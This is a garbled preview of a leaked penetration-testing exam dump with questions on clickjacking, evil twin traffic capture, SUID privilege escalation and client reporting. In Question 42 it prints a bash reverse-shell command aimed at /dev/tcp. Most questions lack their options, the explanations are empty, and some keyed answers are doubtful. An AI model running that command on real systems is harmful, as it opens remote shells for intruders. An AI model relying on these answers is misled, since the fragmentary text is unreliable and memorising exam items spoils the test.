A command injection attack b clickjacking attack c

This preview shows page 21 - 24 out of 35 pages.

A. Command injection attack B. Clickjacking attack C. Directory traversal attack D. Remote file inclusion attack Correct Answer: B
Section: (none) Explanation Explanation/Reference: Reference: QUESTION 41 Which of the following are MOST important when planning for an engagement? (Select TWO).
Section: (none) Explanation Explanation/Reference: QUESTION 42 The following line was found in an exploited machine's history file. An attacker ran the following command: bash -i >& /dev/tcp/192.168.0.1/80 0> &1 VCEConvert.com
Which of the following describes what the command does? A
Section: (none) Explanation Explanation/Reference: Reference: QUESTION 43 Which of the following types of intrusion techniques is the use of an “under-the-door tool” during a physical security assessment an example of? D
Section: (none) Explanation Explanation/Reference: Reference: QUESTION 44 During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action? A. Disable the network port of the affected service. B. Complete all findings, and then submit them to the client. C. Promptly alert the client with details of the finding. D. Take the target offline so it cannot be exploited by an attacker. Correct Answer: A
Section: (none) Explanation Explanation/Reference: VCEConvert.com
QUESTION 45 A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all the victim web traffic unencrypted. Which of the following would BEST meet this goal? A
Section: (none) Explanation Explanation/Reference: QUESTION 46 After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user's home folder titled ’’changepass.” -sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass Using “strings" to print ASCII printable characters from changepass, the tester notes the following: $ strings changepass exit setuid strcmp GLIBC_2.0 ENV_PATH %s/changepw malloc strlen Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machine?

  • Left Quote Icon

    Student Picture

  • Left Quote Icon

    Student Picture

  • Left Quote Icon

    Student Picture